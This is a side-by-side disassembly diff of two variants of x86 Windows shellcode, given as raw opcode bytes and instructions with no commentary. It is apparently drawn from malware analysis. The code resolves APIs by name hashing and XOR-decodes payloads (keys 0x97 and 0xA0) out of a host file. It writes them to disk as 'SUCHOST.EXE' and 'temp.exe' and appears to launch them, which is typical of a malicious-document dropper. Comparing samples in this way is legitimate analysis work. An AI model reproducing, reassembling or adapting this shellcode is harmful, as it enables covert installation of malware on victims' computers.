6800010000	`push 0x100`		6800010000	`push 0x100`
FF5508	`call dword near [ebp+0x8]`		FF5508	`call dword near [ebp+0x8]`
33C0	`xor eax,eax`		33C0	`xor eax,eax`
40	`inc eax`		40	`inc eax`
803C0700	`cmp byte [edi+eax],0x0`		803C0700	`cmp byte [edi+eax],0x0`
75F9	`jnz 0xef`		75F9	`jnz 0xef`
894560	`mov [ebp+0x60],eax`		894560	`mov [ebp+0x60],eax`
C704075C535543	`mov dword [edi+eax],0x4355535c`		C704075C535543	`mov dword [edi+eax],0x4355535c`
C7440704484F5354	`mov dword [edi+eax+0x4],0x54534f48`		C7440704484F5354	`mov dword [edi+eax+0x4],0x54534f48`
C74407082E455845	`mov dword [edi+eax+0x8],0x4558452e`		C74407082E455845	`mov dword [edi+eax+0x8],0x4558452e`
C644070C00	`mov byte [edi+eax+0xc],0x0`		C644070C00	`mov byte [edi+eax+0xc],0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A02	`push byte +0x2`		6A02	`push byte +0x2`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6800000040	`push 0x40000000`		6800000040	`push 0x40000000`
57	`push edi`		57	`push edi`
FF5510	`call dword near [ebp+0x10]`		FF5510	`call dword near [ebp+0x10]`
83F800	`cmp eax,byte +0x0`		83F800	`cmp eax,byte +0x0`
0F8EC7010000	`jng dword 0x2f8`	\|	0F8EC9010000	`jng dword 0x2fa`
894534	`mov [ebp+0x34],eax`		894534	`mov [ebp+0x34],eax`
C7454000000000	`mov dword [ebp+0x40],0x0`		C7454000000000	`mov dword [ebp+0x40],0x0`
81EE00050000	`sub esi,0x500`		81EE00050000	`sub esi,0x500`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6840250000	`push 0x2540`	\|	6800250000	`push 0x2500`
8B4530	`mov eax,[ebp+0x30]`		8B4530	`mov eax,[ebp+0x30]`
50	`push eax`		50	`push eax`
FF5518	`call dword near [ebp+0x18]`		FF5518	`call dword near [ebp+0x18]`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
8D4540	`lea eax,[ebp+0x40]`		8D4540	`lea eax,[ebp+0x40]`
50	`push eax`		50	`push eax`
6A08	`push byte +0x8`	\|	6A30	`push byte +0x30`
56	`push esi`		56	`push esi`
FF7530	`push dword [ebp+0x30]`		FF7530	`push dword [ebp+0x30]`
FF551C	`call dword near [ebp+0x1c]`		FF551C	`call dword near [ebp+0x1c]`
8B06	`mov eax,[esi]`	\|	89B580000000	`mov [ebp+0x80],esi`
		→	8B4628	`mov eax,[esi+0x28]`
894558	`mov [ebp+0x58],eax`		894558	`mov [ebp+0x58],eax`
8B4604	`mov eax,[esi+0x4]`	\|	8B462C	`mov eax,[esi+0x2c]`
894554	`mov [ebp+0x54],eax`		894554	`mov [ebp+0x54],eax`
0500500000	`add eax,0x5000`		0500500000	`add eax,0x5000`
0500B00000	`add eax,0xb000`		0500B00000	`add eax,0xb000`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
50	`push eax`		50	`push eax`
8B4530	`mov eax,[ebp+0x30]`		8B4530	`mov eax,[ebp+0x30]`
50	`push eax`		50	`push eax`
FF5518	`call dword near [ebp+0x18]`		FF5518	`call dword near [ebp+0x18]`
C7454000000000	`mov dword [ebp+0x40],0x0`		C7454000000000	`mov dword [ebp+0x40],0x0`
C7454400000000	`mov dword [ebp+0x44],0x0`		C7454400000000	`mov dword [ebp+0x44],0x0`
33DB	`xor ebx,ebx`		33DB	`xor ebx,ebx`
8B5D58	`mov ebx,[ebp+0x58]`		8B5D58	`mov ebx,[ebp+0x58]`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
8D4540	`lea eax,[ebp+0x40]`		8D4540	`lea eax,[ebp+0x40]`
50	`push eax`		50	`push eax`
6800040000	`push 0x400`		6800040000	`push 0x400`
56	`push esi`		56	`push esi`
FF7530	`push dword [ebp+0x30]`		FF7530	`push dword [ebp+0x30]`
FF551C	`call dword near [ebp+0x1c]`		FF551C	`call dword near [ebp+0x1c]`
33C9	`xor ecx,ecx`		33C9	`xor ecx,ecx`
B900040000	`mov ecx,0x400`		B900040000	`mov ecx,0x400`
80740EFF97	`xor byte [esi+ecx-0x1],0x97`		80740EFF97	`xor byte [esi+ecx-0x1],0x97`
E2F9	`loop 0x1ad`	\|	E2F9	`loop 0x1b4`
8BC3	`mov eax,ebx`		8BC3	`mov eax,ebx`
2D00040000	`sub eax,0x400`		2D00040000	`sub eax,0x400`
83F800	`cmp eax,byte +0x0`		83F800	`cmp eax,byte +0x0`
7F03	`jg 0x1c3`	\|	7F03	`jg 0x1ca`
895D40	`mov [ebp+0x40],ebx`		895D40	`mov [ebp+0x40],ebx`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
8D4544	`lea eax,[ebp+0x44]`		8D4544	`lea eax,[ebp+0x44]`
50	`push eax`		50	`push eax`
FF7540	`push dword [ebp+0x40]`		FF7540	`push dword [ebp+0x40]`
56	`push esi`		56	`push esi`
FF7534	`push dword [ebp+0x34]`		FF7534	`push dword [ebp+0x34]`
FF5520	`call dword near [ebp+0x20]`		FF5520	`call dword near [ebp+0x20]`
81EB00040000	`sub ebx,0x400`		81EB00040000	`sub ebx,0x400`
83FB00	`cmp ebx,byte +0x0`		83FB00	`cmp ebx,byte +0x0`
7FB6	`jg 0x194`	\|	7FB6	`jg 0x19b`
FF7534	`push dword [ebp+0x34]`		FF7534	`push dword [ebp+0x34]`
FF5528	`call dword near [ebp+0x28]`		FF5528	`call dword near [ebp+0x28]`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
57	`push edi`		57	`push edi`
FF5524	`call dword near [ebp+0x24]`		FF5524	`call dword near [ebp+0x24]`
8B4560	`mov eax,[ebp+0x60]`		8B4560	`mov eax,[ebp+0x60]`
C704075C74656D	`mov dword [edi+eax],0x6d65745c`		C704075C74656D	`mov dword [edi+eax],0x6d65745c`
C7440704702E6578	`mov dword [edi+eax+0x4],0x78652e70`		C7440704702E6578	`mov dword [edi+eax+0x4],0x78652e70`
C744070865000000	`mov dword [edi+eax+0x8],0x65`		C744070865000000	`mov dword [edi+eax+0x8],0x65`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A02	`push byte +0x2`		6A02	`push byte +0x2`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6800000040	`push 0x40000000`		6800000040	`push 0x40000000`
57	`push edi`		57	`push edi`
FF5510	`call dword near [ebp+0x10]`		FF5510	`call dword near [ebp+0x10]`
83F800	`cmp eax,byte +0x0`		83F800	`cmp eax,byte +0x0`
0F8ED8000000	`jng dword 0x2f8`	\|	0F8ED3000000	`jng dword 0x2fa`
894534	`mov [ebp+0x34],eax`		894534	`mov [ebp+0x34],eax`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6800500000	`push 0x5000`		6800500000	`push 0x5000`
8B4530	`mov eax,[ebp+0x30]`		8B4530	`mov eax,[ebp+0x30]`
50	`push eax`		50	`push eax`
FF5518	`call dword near [ebp+0x18]`		FF5518	`call dword near [ebp+0x18]`
C7454000000000	`mov dword [ebp+0x40],0x0`		C7454000000000	`mov dword [ebp+0x40],0x0`
C7454400000000	`mov dword [ebp+0x44],0x0`		C7454400000000	`mov dword [ebp+0x44],0x0`
33DB	`xor ebx,ebx`		33DB	`xor ebx,ebx`
8B5D54	`mov ebx,[ebp+0x54]`		8B5D54	`mov ebx,[ebp+0x54]`
81C300B00000	`add ebx,0xb000`		81C300B00000	`add ebx,0xb000`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
8D4540	`lea eax,[ebp+0x40]`		8D4540	`lea eax,[ebp+0x40]`
50	`push eax`		50	`push eax`
6800040000	`push 0x400`		6800040000	`push 0x400`
56	`push esi`		56	`push esi`
FF7530	`push dword [ebp+0x30]`		FF7530	`push dword [ebp+0x30]`
FF551C	`call dword near [ebp+0x1c]`		FF551C	`call dword near [ebp+0x1c]`
33C9	`xor ecx,ecx`		33C9	`xor ecx,ecx`
B900040000	`mov ecx,0x400`		B900040000	`mov ecx,0x400`
80740EFFA0	`xor byte [esi+ecx-0x1],0xa0`		80740EFFA0	`xor byte [esi+ecx-0x1],0xa0`
E2F9	`loop 0x265`	\|	E2F9	`loop 0x26c`
8BC3	`mov eax,ebx`		8BC3	`mov eax,ebx`
2D00040000	`sub eax,0x400`		2D00040000	`sub eax,0x400`
83F800	`cmp eax,byte +0x0`		83F800	`cmp eax,byte +0x0`
7F03	`jg 0x27b`	\|	7F03	`jg 0x282`
895D40	`mov [ebp+0x40],ebx`		895D40	`mov [ebp+0x40],ebx`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
8D4544	`lea eax,[ebp+0x44]`		8D4544	`lea eax,[ebp+0x44]`
50	`push eax`		50	`push eax`
FF7540	`push dword [ebp+0x40]`		FF7540	`push dword [ebp+0x40]`
56	`push esi`		56	`push esi`
FF7534	`push dword [ebp+0x34]`		FF7534	`push dword [ebp+0x34]`
FF5520	`call dword near [ebp+0x20]`		FF5520	`call dword near [ebp+0x20]`
81EB00040000	`sub ebx,0x400`		81EB00040000	`sub ebx,0x400`
83FB00	`cmp ebx,byte +0x0`		83FB00	`cmp ebx,byte +0x0`
7FB6	`jg 0x24c`	\|	7FB6	`jg 0x253`
		→	6A00	`push byte +0x0`
		→	6A00	`push byte +0x0`
		→	6800250000	`push 0x2500`
		→	8B4530	`mov eax,[ebp+0x30]`
		→	50	`push eax`
		→	FF5518	`call dword near [ebp+0x18]`
		→	6A00	`push byte +0x0`
		→	8D4540	`lea eax,[ebp+0x40]`
		→	50	`push eax`
		→	6A30	`push byte +0x30`
		→	56	`push esi`
		→	FF7530	`push dword [ebp+0x30]`
		→	FF551C	`call dword near [ebp+0x1c]`
		→	89B580000000	`mov [ebp+0x80],esi`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
6800900000	`push 0x9000`		6800900000	`push 0x9000`
8B4534	`mov eax,[ebp+0x34]`		8B4534	`mov eax,[ebp+0x34]`
50	`push eax`		50	`push eax`
FF5518	`call dword near [ebp+0x18]`		FF5518	`call dword near [ebp+0x18]`
FF552C	`call dword near [ebp+0x2c]`	\|	8B8580000000	`mov eax,[ebp+0x80]`
33C9	`xor ecx,ecx`	←
33D2	`xor edx,edx`	←
803C0822	`cmp byte [eax+ecx],0x22`	←
7501	`jnz 0x2b4`	←
42	`inc edx`	←
83FA03	`cmp edx,byte +0x3`	←
740B	`jz 0x2c4`	←
81F904010000	`cmp ecx,0x104`	←
7437	`jz 0x2f8`	←
41	`inc ecx`	←
EBE9	`jmp short 0x2ad`	←
03C1	`add eax,ecx`	←
40	`inc eax`	←
33C9	`xor ecx,ecx`	←
803C0822	`cmp byte [eax+ecx],0x22`	←
7403	`jz 0x2d2`	←
41	`inc ecx`	←
EBF7	`jmp short 0x2c9`	←
C6040800	`mov byte [eax+ecx],0x0`	←
6A00	`push byte +0x0`		6A00	`push byte +0x0`
8D4D44	`lea ecx,[ebp+0x44]`		8D4D44	`lea ecx,[ebp+0x44]`
51	`push ecx`		51	`push ecx`
FF7540	`push dword [ebp+0x40]`		FF7540	`push dword [ebp+0x40]`
50	`push eax`		50	`push eax`
FF7534	`push dword [ebp+0x34]`		FF7534	`push dword [ebp+0x34]`
FF5520	`call dword near [ebp+0x20]`		FF5520	`call dword near [ebp+0x20]`
FF7534	`push dword [ebp+0x34]`		FF7534	`push dword [ebp+0x34]`
FF5528	`call dword near [ebp+0x28]`		FF5528	`call dword near [ebp+0x28]`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
57	`push edi`		57	`push edi`
FF5524	`call dword near [ebp+0x24]`		FF5524	`call dword near [ebp+0x24]`
FF7530	`push dword [ebp+0x30]`		FF7530	`push dword [ebp+0x30]`
FF5528	`call dword near [ebp+0x28]`		FF5528	`call dword near [ebp+0x28]`
FF5504	`call dword near [ebp+0x4]`		FF5504	`call dword near [ebp+0x4]`
6A00	`push byte +0x0`		6A00	`push byte +0x0`
50	`push eax`		50	`push eax`
FF550C	`call dword near [ebp+0xc]`		FF550C	`call dword near [ebp+0xc]`
51	`push ecx`		51	`push ecx`
56	`push esi`		56	`push esi`
8B753C	`mov esi,[ebp+0x3c]`		8B753C	`mov esi,[ebp+0x3c]`
8B742E78	`mov esi,[esi+ebp+0x78]`		8B742E78	`mov esi,[esi+ebp+0x78]`
03F5	`add esi,ebp`		03F5	`add esi,ebp`
56	`push esi`		56	`push esi`
8B7620	`mov esi,[esi+0x20]`		8B7620	`mov esi,[esi+0x20]`
03F5	`add esi,ebp`		03F5	`add esi,ebp`
33C9	`xor ecx,ecx`		33C9	`xor ecx,ecx`
49	`dec ecx`		49	`dec ecx`
41	`inc ecx`		41	`inc ecx`
AD	`lodsd`		AD	`lodsd`
03C5	`add eax,ebp`		03C5	`add eax,ebp`
33DB	`xor ebx,ebx`		33DB	`xor ebx,ebx`
0FBE10	`movsx edx,byte [eax]`		0FBE10	`movsx edx,byte [eax]`
3AD6	`cmp dl,dh`		3AD6	`cmp dl,dh`
7408	`jz 0x32a`	\|	7408	`jz 0x32c`
C1CB07	`ror ebx,0x7`		C1CB07	`ror ebx,0x7`
03DA	`add ebx,edx`		03DA	`add ebx,edx`
40	`inc eax`		40	`inc eax`
EBF1	`jmp short 0x31b`	\|	EBF1	`jmp short 0x31d`
3B1F	`cmp ebx,[edi]`		3B1F	`cmp ebx,[edi]`
75E7	`jnz 0x315`	\|	75E7	`jnz 0x317`
5E	`pop esi`		5E	`pop esi`
8B5E24	`mov ebx,[esi+0x24]`		8B5E24	`mov ebx,[esi+0x24]`
03DD	`add ebx,ebp`		03DD	`add ebx,ebp`
668B0C4B	`mov cx,[ebx+ecx*2]`		668B0C4B	`mov cx,[ebx+ecx*2]`
8B5E1C	`mov ebx,[esi+0x1c]`		8B5E1C	`mov ebx,[esi+0x1c]`
03DD	`add ebx,ebp`		03DD	`add ebx,ebp`
8B048B	`mov eax,[ebx+ecx*4]`		8B048B	`mov eax,[ebx+ecx*4]`
03C5	`add eax,ebp`		03C5	`add eax,ebp`
AB	`stosd`		AB	`stosd`
5E	`pop esi`		5E	`pop esi`
59	`pop ecx`		59	`pop ecx`
C3	`ret`		C3	`ret`
E825FDFFFF	`call dword 0x70`	\|	E823FDFFFF	`call dword 0x70`
61	`popad`		61	`popad`
6B	`db 0x6B`		6B	`db 0x6B`
61	`popad`		61	`popad`
6B	`db 0x6B`		6B	`db 0x6B`